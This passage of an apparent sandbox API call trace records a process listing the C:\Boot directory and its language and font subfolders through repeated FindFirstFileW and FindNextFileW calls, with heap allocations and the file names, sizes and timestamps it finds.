ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.932] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.932] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.932] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.932] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.932] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0032.932] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.932] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.935] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.935] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.935] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.935] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.935] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0032.935] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.935] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.935] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.935] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.936] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.936] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.936] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0032.936] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.936] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.938] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.938] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.939] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.939] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.939] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0032.939] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.939] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.941] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.941] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.941] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.942] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.942] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0032.942] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.942] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.944] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.944] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.944] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.944] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.944] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0032.944] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.944] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.967] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.969] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0032.986] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.986] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.986] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0032.986] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.986] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.986] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.986] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.987] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.987] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.987] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0032.987] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.987] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.987] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.987] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.987] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.987] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.987] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0032.987] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.987] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.987] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.987] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.988] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.988] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.988] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0032.988] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.988] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.988] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.988] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, 